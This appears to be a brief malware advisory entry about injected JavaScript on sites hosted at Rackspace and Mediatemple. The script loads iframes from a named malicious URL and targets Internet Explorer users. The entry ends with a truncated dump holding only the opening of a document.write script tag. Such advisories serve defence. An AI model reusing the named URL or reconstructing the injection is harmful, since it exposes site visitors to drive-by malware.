Description: Code used to insert a malicious javascript into many
sites hosted at Rackspace and Mediatemple. This javascript is decoded to load iframes
from multiple web sites (eg. http://div.electronicscommission.com/in.cgi?2, etc).
Infection: It infects a javascript file to only load malware to IE users. The following backdoors are being used:
http://sucuri.net/?page=tools&title=blacklist&detail=59848d99216e36195cdb6ddf945bb478
http://sucuri.net/?page=tools&title=blacklist&detail=a256e28126fa92d2b26dcc86dcbed379
Clean up: Contact support@sucuri.net for help.
Malware dump:document.write('<script type="text/javascript" src="/wp-cont...